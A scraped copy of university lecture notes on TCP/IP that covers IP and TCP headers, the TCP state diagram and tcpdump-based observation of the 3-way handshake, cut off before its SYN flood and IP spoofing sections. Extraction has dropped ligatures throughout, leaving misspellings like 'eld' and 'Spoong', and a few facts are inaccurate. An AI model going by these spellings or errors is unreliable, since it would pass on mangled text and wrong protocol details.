Lecture 16

Download as pdf or txt
Download as pdf or txt
You are on page 1of 92

Lecture 16: TCP/IP Vulnerabilities: IP Spoong and Denial-of-Service Attacks

Lecture Notes on Computer and Network Security by Avi Kak ([email protected])


April 30, 2013
1:56pm c 2013 Avinash Kak, Purdue University

Goals:
To review the IP and TCP packet headers TCP State Transition Diagram TCP Vulnerabilities The SYN Flood Attack for Denial of Service IP Spoong Attacks How Feasible are the SYN Flood Denial-of-Service and the IP Spoong Attacks Today? Troubleshooting Networks with the Netstat Utility
1

CONTENTS
Section Title Page

16.1 16.2 16.3

TCP and IP The TCP/IP Protocol Stack The Network Layer (also known as the Internet Layer or the IP Layer The Transport Layer (TCP) TCP versus IP How TCP Breaks Up a Byte Stream That Needs to be Sent to a Receiver The TCP State Transition Diagram A Demonstration of the 3-Way Handshake TCP Re-Transmissions TCP Congestion Control TCP Timers The Much Feared SYN Flood Attack for Denial of Service IP Spoong How Feasible are the SYN Flood and the IP Spoong Attacks Today? Using the Netstat Utility for Troubleshooting Networks Homework Problems

3 5 10

16.4 16.5 16.6

15 24 26

16.7 16.8 16.9 16.10 16.11 16.12

28 34 41 43 47 49

16.13 16.14

53 63

16.15 16.16

76 86

Computer and Network Security by Avi Kak

Lecture 16

16.1: TCP AND IP

We now live in a world in which the acronyms TCP and IP have become almost as commonly familiar as the other computerrelated words like bits, bytes, megabytes, etc.

IP stands for the Internet Protocol that deals with routing packets of data from one computer to another or from one router to another.

On the other hand, TCP, which stands for Transmission Control Protocol, deals with ensuring that the data packets are delivered in a reliable manner from one computer to another. You could say that TCP sits on top of IP.

A less reliable version of TCP is UDP (User Datagram Protocol). Despite the pejorative sense associated with the phrase less reliable, UDP is extremely important to the working of the internet, as you will discover in this and the next lecture.
3

Computer and Network Security by Avi Kak

Lecture 16

The dierent communication and application protocols that regulate how computers work together are commonly visualized as belonging to a layered organization of protocols that is referred to as the TCP/IP protocol stack.

Computer and Network Security by Avi Kak

Lecture 16

16.2: THE TCP/IP PROTOCOL STACK

The four dierent layers of the TCP/IP protocol stack are 1. Application Layer (HTTP, FTP, SMTP, SSH, POP3, TLS/SSL, DNS, etc.)

2. Transport Layer (TCP, UDP, etc.) 3. Network Layer (IP (IPv4, IPv6), ICMP, IGMP, etc.) 4. Link Layer (Ethernet, WiFi, PPP, SLIP, etc.) The Network Layer is also referred to as the Internet Layer.

Even though TCP and IP are just two of the protocols that reside in the stack, the entire stack is commonly referred to as the
5

Computer and Network Security by Avi Kak

Lecture 16

TCP/IP protocol stack. That is probably because, of the various protocols shown in the stack, TCP and IP were the rst two to be developed.

The layered representation of the protocols shown above is somewhat lacking with regard to the Application Layer. As a case in point, it is not reasonable to think of both HTTP and TLS/SSL at the same level because the former calls on the latter for security. In that sense, HTTP should be placed above TLS/SSL. [The acronym HTTP stands the HyperText Transport Protocol, TLS for the Transport Layer Security, and SSL for Secure Socket Layer.]

A superior layering of the protocols is provided by the seven-layer OSI (Open System Interconnection) Model that splits the Application Layer of the TCP/IP stack into three ner grained layers: Application Layer, Presentation Layer, and Session Layer. In this model, TLS/SSL would belong to the Session Layer, whereas HTTP would stay in the Application Layer. The Presentation Layer includes protocols such as the SMB (Samba) protocol that is used to provide support for cross-platform (Microsoft Windows, Mac OS X, and other Unix systems) sharing of les and printers. [For the Windows users, NetBIOS (which
stands for Network Basic Input/Output System) provides network related services at the Session Layer. Note that NetBIOS is only an API and, in its modern implementation, it uses TCP/IP for transport (in which case it is also known as NetBT). So in a modern Windows machine, you have a Presentation

Computer and Network Security by Avi Kak

Lecture 16

Layer resource-sharing protocol like SMB (used for connecting to a networked disk drive on another machine) sitting on top of NetBIOS in the Session Layer and that in turn sits on top of TCP/IP in the Transport Layer. At least in principle, this allows the Windows resources to be shared on the internet but at potentially great security risk (see Lecture 22). Ports 139 and 445 are assigned to the SMB protocol.

The OSI model also breaks the Link Layer of TCP/IP into two layers: the Data Link Layer and the Physical Layer. Perhaps the most important protocol at the Data Link Layer is the Media Access Control (MAC) protocol. The MAC protocol provides the addressing mechanism (you have surely heard of
MAC addresses that are associated with ethernet and WiFi interfaces; ethernet refers to the technologies that are used in both the Data Link Layer and the Physical Layer

) for data packets to be routed to a particular machine in a LAN (Local Area Network). The MAC protocol also uses sub-protocols, such as the CSMA/CD (Carrier Sense Multiple Access with Collision Detection) protocol, to decide when the machines connected to the same communication medium, such as a LAN, should communicate. [The way all the computer connected to the same hub, repeater, or router communicate
is very analogus to a group of people trying to have a conversation. If everyone speaks at the same time, no one will hear/understand anything. So the participants in a group conversation must observe some etiquette so that everyone can be heard. The CSMA protocol is one way to ensure the same for the case of computers in the same LAN. A computer wishing to transmit data must wait until the medum has become

] The Physical Layer would be represented by the propagation medium (cables, wireless, and so on, and the associated components like repeaters, ampliers, etc.
quiet.

Computer and Network Security by Avi Kak

Lecture 16

Another commonly used protocol that does not conveniently t into the 4-layer TCP/IP model is the ICMP protocol. ICMP, which stands for the Internet Control Message Protocol (RFC 792), is used for the following kinds of error/status messages in computer networks: Announce Network Errors: When a host or a portion of the network becomes unreachable, an ICMP message is sent back to the sender. Announce Network Congestion: If the rate at which a router can transmit packets is slower than the rate at which it receives them, the routers buers will begin to ll up. To slow down the incoming packets, the router sends the ICMP Source Quench message back to the sender. Assist Troubleshooting: The ICMP Echo messages are used by the popular ping utility to determine if a remote host is alive, for measuring round-trip propagation time to the remote host, and for determining the fraction of Echo packets lost enroute. Announce Timeouts: When a packets TTL (Time To Live) drops to zero, the router discarding the packet sends an ICMP time exceeded message back to the sender announcing this fact. [As you will see in Section 16.3, every IP packet contains a TTL eld that is decremented every time the packet passes through a router.] [The commonly used
traceroute utility is based on the receipt of such time exceeded ICMP packets for tracing the route taken

Computer and Network Security by Avi Kak

Lecture 16

to a destination IP address.

The ICMP protocol is a bit of a cross between the Link Layer and the Transport Layer. Its headers are basically the same as those of the Link Layer but with a little bit extra information thrown in during the encapsulation phase.

In case you are wondering about the acronym IGMP shown associated with the Network Layer in the four-layer TCP/IP protocol suite at the beginning of this section, it stands for Internet Group Management Protocol. IGMP packets are used for multicasting on the internet. In the jargon of internet communications, a multicast consists of a simultaneous transmission of information to a group of subscribers. The packets stay as a single stream as long as the network topology allows it. An IGMP header includes the IP addresses of the subscribers. So by examining an IGMP header, an enroute router can decide whether it is necessary to send copies of packet to multiple destinations, or whether just one packet can be sent to the next router.

On the transmit side, as each packet descends down the protocol stack, each layer adds its own header to the packet.

Computer and Network Security by Avi Kak

Lecture 16

16.3: THE NETWORK LAYER (ALSO KNOWN AS THE INTERNET LAYER OR THE IP LAYER)

The header added by the IP layer includes information as to which higher level protocol the packet came from. The header added to the packet by the IP layer also includes information on what host the packet is going to, and the host the packet came from. Shown below is the IP Header format
0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |version| IHL | DS |ECN| Total Length | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Identification |Flags| Fragment Offset | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Time To Live | Protocol | Header Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source IP Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Destination IP Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Options | Padding | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The various elds of the header are:

10

Computer and Network Security by Avi Kak

Lecture 16

The version eld (4 bits wide) refers to the version of the IP protocol. The header shown is for IPv4. The IHL eld (4 bits wide) is for Internet Header Length; it is the length of the IP header in 32-bit words. The minimum value for this eld is 5 for ve 32-bit words. The Dierentiated Service (DS) eld (6 bits wide) and the Explicit Congestion Notication (ECN) eld (2 bits wide) together used to be called the Type of Service eld (8 bits wide). They are both used to indicate the priority to be accorded to a packet. The routers may ignore these elds. The Total Length eld (16 bits wide) is the size of the packet in bytes, including the header and the data. The minimum value for this eld is 576. The Identication eld (16 bits wide) is assigned by the sender to help the receiver with the assembly of fragments back into a datagram. The Flags eld (3 bits wide) is for setting the two control bits at the second and the third position. The rst of the the three bits is reserved and must be set to 0. When the second bit is 0, that means that this packet can be further fragmented; when set to 1 stipulates no further fragmentation. The third
11

Computer and Network Security by Avi Kak

Lecture 16

bit when set to 0 means this is the last fragment; when set to 1 means more fragments are coming. [The IP layer should not
send to the lower-level physical-link layer packets that are larger than what the physical layer can handle. The size of the largest packet that the physical layer can handle is referred to as Maximum Transmission Unit (MTU). For regular networks (meaning the networks that are not ultrafast), MTU is typically 1500 bytes. [Also see the structure of an Ethernet frame in Section
23.3 of Lecture 23.] Packet fragmentation by the IP layer becomes necessary when the descending

packets size is larger than the MTU for the physical layer. We may refer to the packet that is descending down the protocol suite and received by the IP layer as the datagram. The information in the IP headers of the packets resulting from fragmentation must allow the packets to be reassembled into datagrams at the receiving end even when those packets are received out of order.

The Fragment Oset eld (13 bits wide) indicates where in the datagram this fragment belongs. The fragment oset is measured in units of 8 bytes. This eld is 0 for the rst fragment. The Time To Live eld (8 bits wide) determines how long the packet can live in the internet. As previously mentioned near the end of Section 16.2, each time a packet passes through a router, its TTL is decremented by one. The Protocol eld (8 bits wide) is the integer identier for the higher-level protocol that generated the data portion of this packet. [The integer identiers for protocols are assigned by IANA (Internet Assigned Numbers Authority). For example, ICMP is assigned the decimal value 1, TCP 6, UDP 17, etc.]
12

Computer and Network Security by Avi Kak

Lecture 16

The Header Checksum eld (16 bits wide) is a checksum on the header only (using 0 for the checksum eld itself). Since TTL varies each time a packet passes through a router, this eld must be recomputed at each routing point. The checksum is calculated by dividing the header into 16-bit words and then adding the words together. This provides a basic protection against corruption during transmission. The Source Address eld (32 bits wide) is the IP address of the source. The Destination Address eld (32 bits wide) is the IP address of the destination. The Options eld consist of zero or more options. The optional elds can be used to associate handling restrictions with a packet for enforcing security, to record the actual route taken from the source to the destination, to mark a packet with a timestamp, etc. The Padding eld is used to ensure that the IP header ends on a 32-bit boundary.

As should be clear from our description of the various IP header elds, the IP protocol is responsible for fragmenting a descending datagram at the sending end and reassembling the packets into
13

Computer and Network Security by Avi Kak

Lecture 16

what would become an ascending datagram at the receiving end. As mentioned previously, fragmentation is carried out so that the packets can t the packet size as dictated by the hardware constraints of the lower-level physical layer. [If the IP layer produces outgoing
packets that are too small, any IP layer ltering (See Lecture 18 for what that means) at the receiving end may nd it dicult to read the higher layer header information in the incoming packets. Fortunately, with the more recent Linux kernels, by the time the packets are seen by iptables, they are suciently defragmented so that this is not a problem.

Note that, whereas the TCP protocol, to be reviewed next, is a connection-oriented protocol, the IP protocol is a connectionless protocol. In that sense, IP is an unreliable protocol. It simply does not know that a packet that was put on the wire was actually received.

14

Computer and Network Security by Avi Kak

Lecture 16

16.4: THE TRANSPORT LAYER (TCP)

Through handshaking and acknowledgments, TCP provides a reliable communication link between two hosts on the internet.

When we say that a TCP connection is reliable, we mean that the senders TCP always knows whether or not a packet reached the receivers TCP. If the senders TCP does not receive an acknowledgement that its packet had reached the destination, the senders TCP simply resends the packet. Additionally, certain data integrity checks on the transmitted packets are carried out at the receiver to ensure that the receivers TCP accepts only error-free packets.

A TCP connection is full-duplex, meaning that a TCP connection simultaneously supports two byte-streams, one for each direction of a communication link.

TCP includes both a ow control mechanism and a congestion control mechanism.


15

Computer and Network Security by Avi Kak

Lecture 16

Flow control means that the receivers TCP is able to control the size of the segment dispatched by the senders TCP. [The This the beginning of Section 16.6 denes what we mean by a TCP segment.] receivers TCP accomplishes by putting to use the Window eld of an acknowledgement packet, as you will see in Section 16.6.

Congestion control means that the senders TCP varies the rate at which it places the packets on the wire on the basis of the trac congestion on the route between the sender and the receiver. The sender TCP can measure trac congestion by measuring the rate at which the ICMP source-quench messages are received from the routers (See Section 16.2 for ICMP messages) when their buers start to ll up. We will discuss this further in Section 16.9.

The header of a TCP segment is shown on the next page. (taken from RFC793, dated 1981). See the beginning of Section 16.6 for what is meant by a TCP segment.

16

Computer and Network Security by Avi Kak

Lecture 16

0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Port | Destination Port | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Sequence Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Acknowledgment Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Data | |U|A|P|R|S|F| | | Offset| Reserved |R|C|S|S|Y|I| Window | | | |G|K|H|T|N|N| | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Checksum | Urgent Pointer | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Options | Padding | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The various elds of the TCP header are: The Source Port eld (16 bits wide) for the port that is the source of this TCP segment. The Destination Port eld (16 bits wide) for the port of the remote machine that is the nal destination of this TCP segment.

The Sequence Number eld The Acknowledgment Number eld with each of these two elds being 32 bits wide. These two
17

Computer and Network Security by Avi Kak

Lecture 16

elds considered together have two dierent roles to play depending on whether a TCP connection is in the process of being set up or whether an already-established TCP connection is exchanging data: When a host A rst wants to establish a TCP connection with a remote host B , the two hosts A and B must engage in the following 3-way handshake:
1. A sends to B what is known as a SYN packet. (What that means will become clear shortly). The Sequence Number in this TCP packet is a randomly generated number M . This random number is also known as the initial sequence number (ISN) and the random number generator used for this purpose also known as the ISN generator. 2. The remote host B must send back to A what is known as a SYN+ACK packet containing what B expects will be the next sequence number from A the number M + 1 in B s Acknowledgment Number eld. The SYN+ACK packet sent by B to A must also contain in its Sequence Number eld another randomly generated number, N . [The ISN number N plays the same role in B to A transmissions that the ISN M plays in A to B transmissions.] 3. Now A must respond with an ACK packet with its Acknowledgment Number eld containing its expectation of the sequence number that B will use in its next TCP transmission to A the number N + 1. This transmission from A to B completes a three-way handshake for the establishment of a TCP connection.
18

Computer and Network Security by Avi Kak

Lecture 16

In an on-going connection between two parties A and B , the Sequence Number and the Acknowledgement Number elds are used to keep track of the byte count in the data streams that are exchanged between the two in the following manner:
1. Each endpoint in a TCP communication link associates a byte count with the rst byte of the outgoing bytes in each TCP segment. 2. This byte-count index is added to the initially sent ISN and placed in the Sequence Number eld for an outgoing TCP packet. [Say an application at A wants to send 100,000 bytes to an application
running at B . Lets say that As TCP wants to break this up into 100 segments, each of size 1000 bytes. So As TCP will send to B s TCP a packet containing the rst 1000 bytes of data from the longer byte stream. The Sequence Number eld of the TCP header for this outgoing packet will contain 0, which is the index of the rst data byte in the outgoing segment in the 100,000 byte stream,

plus the ISN used for the initiation

of the connection. The Sequence Number eld of the next TCP segment from A to B will the sequence number in the rst segment plus 1000, and so on.]

3. When B receives these TCP segments, the Acknowledgment Number eld of B s ACK packets contains the index it expects to see in the Sequence Number eld of the next TCP segment it hopes to receive from A.

The Data Oset eld (4 bits wide). This is the number of 32-words in the TCP header. The Reserved eld (6 bits wide). This is reserved for future.
19

Computer and Network Security by Avi Kak

Lecture 16

Until then its value must be zero. The Control Bits eld (6 bits wide). These bits, also referred to as ags, carry the following meaning: 1st ag bit: URG when set means URGENT data. A packet whose URG bit is set can act like an interrupt with regard to the interaction between the sender TCP and the receiver TCP. More on this at the end of this section. 2nd ag bit: ACK when set means acknowledgment. 3rd ag bit: PSH when set means that we want the TCP segment to be put on the wire immediately (useful for very short messages and when echo-back is needed for individual characters). Ordinarily, TCP waits for its input buer to ll up before forming a TCP segment. 4th ag bit: RST when set means that the sender wants to reset the connection. 5th ag bit: SYN of sequence numbers. when set means synchronization

6th ag bit: FIN when set means the sender wants to terminate the connection. Obviously, then, when only the 5th control bit is set in the header of a TCP segment, we may refer to the IP packet that
20

Computer and Network Security by Avi Kak

Lecture 16

contains the segment as a SYN packet. By the same token, when only the 2nd control bit is set in TCP header , we may refer to the IP packet that contains the segment as an ACK packet. Along the same lines, a TCP segment for which both the 2nd and the 5th control bits are set results in a packet that is referred to as the SYN+ACK packet. A packet for which the 6th control bit is set is referred to as a FIN packet; and so on.

The Window eld (16 bits wide) indicates the maximum number of data bytes the receivers TCP is willing to accept from the senders TCP in a single TCP segment. Section 16.6 addresses in greater detail how this eld is used by the receivers TCP to regulate the TCP segment size put on the wire by the senders TCP.

The Checksum eld (16 bits wide) is computed by adding all 16-bit words in a 12-byte pseudo header (to be explained in the next bullet), the TCP header, and the data. If the data contains an odd number of bytes, a padding consisting of a zero byte is appended to the data. The pseudo-header and the padding are not transmitted with the TCP segment. While computing the checksum, the checksum eld itself is replaced with zeros. The carry bits generated by the addition are added to the 16bit sum. The checksum itself is the ones complement of the sum. (By ones complement we mean reversing the bits.)
21

Computer and Network Security by Avi Kak

Lecture 16

Ill now explain the notion of the pseudo-header used in the calculation of the checksum. As described below, by including in the pseudo-header the source and the destination IP addresses this is the information thats meant to be placed in the encapsulating IP header at the sending end and that is retrieved from the encapsulating IP header and the communication interface at the receiving end the TCP engine makes certain that a TCP segment was actually received at the destination IP address for which it was intended. The sending TCP and the receiving TCP must construct the pseudoheader independently. At the receiving end, the pseudoheader is constructed from the overall length of the received TCP segment, the source IP address from the encapsulating IP header, and the destination IP address as assigned to the communications interface through which the segment was received. More precisely, for the IPv4 protocol, the 12 bytes of a pseudo-header are made up of
4 bytes for the source IP address 4 bytes for the destination IP address 1 byte of zero bits, 1 byte whose value represents the protocol for which the checksum is being carried out. It is 6 for TCP. It is the same number that goes into the Protocol eld of the encapsulating IP header. 2 bytes for the length of the TCP segment, including both the TCP header and the data

Calculating the checksum in this manner gives us an end-toend verication from the sending TCP to the receiving TCP that the TCP segment was delivered to its intended destination. [For how the checksum is calculated when TCP is run over IPv6, see RFC 2460. The main
22

Computer and Network Security by Avi Kak

Lecture 16

dierence lies in including the Next header eld in the pseudo-header.

That brings us to the Urgent Pointer eld (16 bits wide) in a TCP header. When urgent data is sent, that is, when a TCP header has its URG bit set, that means that the receiving TCP engine should temporarily suspend accumulating the byte stream that it might be in the middle of and give higher priority to the urgent data. The value stored in the Urgent Pointer eld is the oset from the value stored in the Sequence Number eld where the urgent data ends. The urgent data obviously begins with the beginning of the data payload in the TCP segment in question. After the application has been delivered the urgent data, the TCP engine can go back to attending to the byte stream that it was in the middle of. This can be useful in situations such as remote login. One can use urgent data TCP segments to abort an application at a remote site that may be in middle of a long data transfer from the sending end.

The Options eld is of variable size. If any optional header elds are included, their total length must be a multiple of a 32-bit word.

23

Computer and Network Security by Avi Kak

Lecture 16

16.5: TCP VERSUS IP

IPs job is to provide a packet delivery service for the TCP layer. IP does not engage in handshaking and things of that sort. So, all by itself, it does not provide a reliable connection between two hosts in a network.

On the other hand, the user processes interact with the IP Layer through the Transport Layer. TCP is the most common transport layer used in modern networking environments. Through handshaking and exchange of acknowledgement packets, TCP provides a reliable delivery service for data segments with ow and congestion control.

It is the TCP connection that needs the notion of a port. That is, it is the TCP header that mentions the port number used by the sending side and the port number to use at the destination.

What that implies is that a port is an applicationlevel notion. The TCP layer at the sending end wants a data segment to be received at a specic port at the receiving end. The
24

Computer and Network Security by Avi Kak

Lecture 16

sending TCP layer also expects to receive the receiver acknowledgments at a specic port at its own end. Both the source and the destination ports are included the TCP header of an outgoing data segment.

Whereas the TCP layer needs the notion of a port, the IP layer has NO need for this concept. The IP layer simply shoves o the packets to the destination IP address without worrying about the port mentioned inside the TCP header embedded in the IP packet.

When a user application wants to establish a communication link with a remote host, it must provide source/destination port numbers for the TCP layer and the IP address of the destination for the IP layer. When a port is paired up with the IP address of the remote machine whose port we are interested in, the paired entity is known as a socket. That socket may be referred to as the destination socket or the remote socket. A pairing of the source machine IP address with the port used by the TCP layer for the communication link would then be referred to as the source socket. The two sockets at the end-points uniquely dene a communication link.

25

Computer and Network Security by Avi Kak

Lecture 16

16.6: HOW TCP BREAKS UP A BYTE STREAM THAT NEEDS TO BE SENT TO A RECEIVER

Suppose an Application Layer protocol wants to send 10,000 bytes of data to a remote host. TCP will decide how to break this byte stream into TCP segments. This decision by TCP depends on the Window eld sent by the receiver. The value of the Window eld indicates the maximum number of bytes the receiver TCP will accept in each TCP segment. The receiver TCP sets a value for this eld depending on the amount of memory allocated to the connection for the purpose of buering the received data.

As mentioned in Section 16.4, after a connection is established, TCP assigns a sequence number to every byte in an outgoing byte stream. A group of contiguous bytes is grouped together to form the data payload for what is known as a TCP segment. A TCP segment consists of a TCP header and the data. A TCP segment may also be referred to as a TCP datagram or a TCP packet. The TCP segments are passed on to the IP layer for onward transmission.
26

Computer and Network Security by Avi Kak

Lecture 16

The receiver sending back a value for the Window eld is the main ow control mechanism used by TCP. This is also referred to as the TCPs sliding window algorithm for ow control.

If the receiver TCP sends 0 for the Window eld, the sender TCP stops pushing segments into the IP layer on its side and starts what is known as the Persist Timer. This timer is used to protect the TCP connection from a possible deadlock situation that can occur if an updated value for Window from the receiver TCP is lost while the sender TCP is waiting for an updated value for Window. When the Persist Timer expires, the sender TCP sends a small segment to the receiver TCP (without any data, the data being optional in a TCP segment) with the expectation that the ACK packet received in response will contain an updated value for the Window eld.

27

Computer and Network Security by Avi Kak

Lecture 16

16.7: THE TCP STATE TRANSITION DIAGRAM

The State of a TCP Connection at Local for a Connection between Local and Remote

LISTEN
Received from Remote: SYN Send back to Remote: SYN+ACK Application: Open Application: Send Syn Send to Remote:SYN Application: Close

SYN_RCVD

Received from Remote:SYN Send back to Remote: SYN+ACK

SYN_SENT

Active Open Send to Remote: SYN

Received from Remote: ACK Application: Close Send to Remote: FIN Application: Close Send to Remote: FIN Received from Remote:SYN+ACK ACK Send back to Remote: Application: Close

ESTABLISHED

Received From Remote:FIN Send back to Remote: ACK

CLOSED

FIN_WAIT_1

Received from Remote:FIN Send to Remote: ACK

CLOSE_WAIT
Application: Close Send to Remote: FIN

Received from Remote:ACK

CLOSING
Received from Remote:ACK

LAST_ACK
Received from Remote: ACK

FIN_WAIT_2
Received From Remote:FIN Send to Remote:ACK

TIME_WAIT Timeout
Copyright2007: A. C. Kak

28

Computer and Network Security by Avi Kak

Lecture 16

As shown in the state transition diagram on the previous page, a TCP connection is always in one of the following 11 states.
LISTEN SYN_RECD SYN_SENT ESTABLISHED FIN_WAIT_1 FIN_WAIT_2 CLOSE_WAIT LAST_ACK CLOSING TIME_WAIT CLOSED

The rst ve of the states listed above are for initiating and maintain a connection and the last six for terminating a connection. [To actually see for yourself these states as your machine makes and breaks connections with the hosts
in the internet, re up your web browser and point it to a web site like www.cnn.com that downloads a rather large number of third-party advertisement web pages. At the same time, get ready to execute the command netstat | grep -i tcp in a terminal window of your machine. Run this command immediately after you have asked your browser to go the CNN website. In each line of the output produced by netstat you will be able to see the state of a TCP connection established by your machine. Now shut down the web browser and execute the netstat command again. If you run this command repeatedly in quick succession, you will see the TCP connections changing their states from ESTABLISHED to TIME WAIT to CLOSE WAIT etc. netstat utility. Section 16.15 presents further information on the

A larger number of states are needed for connection termination


29

Computer and Network Security by Avi Kak

Lecture 16

because the state transitions depend on whether it is the local host that is initiating termination, or the remote that is initiating termination, or whether both are doing so simultaneously:

An ongoing connection is in the ESTABLISHED state. It is in this state that data transfer takes place between the two end points.

Initially, when you rst bring up a network interface on your local machine, the TCP connection is in the LISTEN state.

When a local host wants to establish a connection with a remote host, it sends a SYN packet to the remote host. This causes the about-to-be established TCP connection to transition into the SYN SENT state. The remote should respond with a SYN+ACK packet, to which the local should send back an ACK packet as the connection on the local transitions into the ESTABLISHED state. This is referred to as a three-way handshake.

On the other hand, if the local host receives a SYN packet from a remote host, the state of the connection on the local host transitions into the SYN RECD state as the local sends a SYN+ACK packet back to the remote. If the remote comes back with an ACK packet, the local transitions into the ESTABLISHED state. This is again
30

Computer and Network Security by Avi Kak

Lecture 16

a 3-way handshake.

Regarding the state transition for the termination of a connection, each end must independently close its half of the connection.

Lets say that the local host wishes to terminate the connection rst. It sends to the remote a FIN packet (recall from Section 16.4 that FIN is the 6th ag bit in the TCP header) and the TCP connection on the local transitions from ESTABLISHED to FIN WAIT 1. The remote must now respond with an ACK packet which causes the local to transition to the FIN WAIT 2 state. Now the local waits to receive a FIN packet from the remote. When that happens, the local replies back with a ACK packet as it transitions into the TIME WAIT state. The only transition from this state is a timeout after two segment lifetimes (see explanation below) to the state CLOSED.

About connection teardown, it is important to realize that a connection in the TIME WAIT state cannot move to the CLOSED state until it has waited for two times the maximum amount of time an IP packet might live in the internet. The reason for this is that while the local side of the connection has sent an ACK in response to the other sides FIN packet, it does not know that the ACK was successfully delivered. As a consequence the
31

Computer and Network Security by Avi Kak

Lecture 16

other side might retransmit its FIN packet and this second FIN packet might get delayed in the network. If the local side allowed its connection to transition directly to CLOSED from TIME WAIT, if the same connection was immediately opened by some other application, it could shut down again upon receipt of the delayed FIN packet from the remote.

The previous scenario dealt with the case when the local initiates the termination of a connection. Now lets consider the case when the remote host initiates termination of a connection by sending a FIN packet to the local. The local sends an ACK packet to the remote and transitions into the CLOSE WAIT state. It next sends a FIN packet to remote and transitions into the LAST ACK state. It now waits to receive an ACK packet from the remote and when it receives the packet, the local transitions to the state CLOSED.

The third possibility occurs when both sides simultaneously initiate termination by sending FIN packets to the other. If the remotes FIN arrives before the local has sent its FIN, then we have the same situation as in the previous paragraph. However, if the remotes FIN arrives after the locals FIN has gone out, then we are at the rst stage of termination in the rst scenario when the local is in the FIN WAIT 1 state. When the local sees the remote FIN in this state, the local transitions into the CLOSING state as it sends ACK to the remote. When it receives an ACK
32

Computer and Network Security by Avi Kak

Lecture 16

from remote in response, it transitions to the TIME WAIT state.

In the state transition diagram shown, when an arc has two items associated with it, think of the rst item as the event that causes that particular transition to take place and think of the second item as the action that is taken by TCP machine when the state transition is actually made. On the other hand, when an arc has only one item associated with it, that is the event responsible for that state transition; in this case there is no accompanying action (it is a silent state transition, you could say).

33

Computer and Network Security by Avi Kak

Lecture 16

16.8: A DEMONSTRATION OF THE 3-WAY HANDSHAKE

In Section 16.4, when presenting the Sequence Number and Acknowledgement Number elds in a TCP header, I described how a 3-way handshake is used to initiate a TCP connection between two hosts. To actually see these 3-way handshakes, do the following:

Fire up the tcpdump utility in one of the terminal windows of your Ubuntu laptop with a command line that looks like one of the following:
tcpdump -v -n host 192.168.1.102 tcpdump -vvv -nn -i eth0 -s 1500 host 192.168.1.102 -S -X -c 5 tcpdump -nnvvvXSs 1500 host 192.168.1.102 and dst port 22 tcpdump -vvv -nn -i wlan0 -s 1500 -S -X -c 5 src 10.185.37.87 or dst 10.185.37.87 and port 22 ...

where, unless you are engaged in IP spoong, youd replace the string 192.168.1.102 (which is the IP address assigned by DHCP
34

Computer and Network Security by Avi Kak

Lecture 16

to my laptop when I am at home behind a LinkSys router) or the string 10.185.37.87 by the address assigned to your machine. As to which form of the tcpdump command you should use depends on how busy the LAN is to which your laptop is connected. The very rst form will usually suce in a home network. For busy LANs, you would want tcpdump to become more and more selective in the packets it snis o the ethernet medium. [For classroom
demonstration with my laptop hooked into the Purdue wireless network, I use the last of the command strings shown above. Obviously, since the IP addresses are assigned dynamically by the DHCP protocol when I am connected in this manner, Id need to alter the address 10.185.37.87 for each new

] Note that you only need to supply the -i wlan0 option if have multiple interfaces (which may happen if your ethernet interface is on at the same time) that are sning packets. [You may
session.
have to be logged in as root for this to work. The tcpdump utility, as I will describe in greater detail in Lecture 23, is a command-line packet snier. To see all the interfaces that tcpdump knows about, execute as root the command tcpdump -D that should print out the names of all the interfaces that your OS knows about

and then select the interface for the packet snier with the help of the -i option as in tcpdump -vvv -nn -i eth0 . If you are using just the wireless interface on your Ubuntu machine, you are likely to use the following version of the same command: tcpdump -vvv -nn -i wlan0 . The -vvv option controls the level of verbosity in the output shown by tcpdump. The -n option shows the IP addresses in their numerical form and the -nn option does the same for both the IP address and the port names. [Important: If you do not use the

-nn option, the packet trac displayed by tcpdump will include the reverse DNS calls by tcpdump itself as it tries to gure out the symbolic hostnames associated with the IP addresses in the packet headers.] Other possible commonly used ways to invoke tcpdump are: tcpdump udp if you want

to capture just the UDP trac (note two things here: no dash before the protocol name, and also if you do not mention the transport protocol, tcpdump will capture both tcp and udp packets); tcpdump port http if you want to see just the TCP port 80 trac; tcpdump -s 1500 tcpdump -c 100 if you only want to capture 100 packets;

if you want to campture only 50 bytes for each packet [if you do man tcpdump, you

35

Computer and Network Security by Avi Kak

Lecture 16

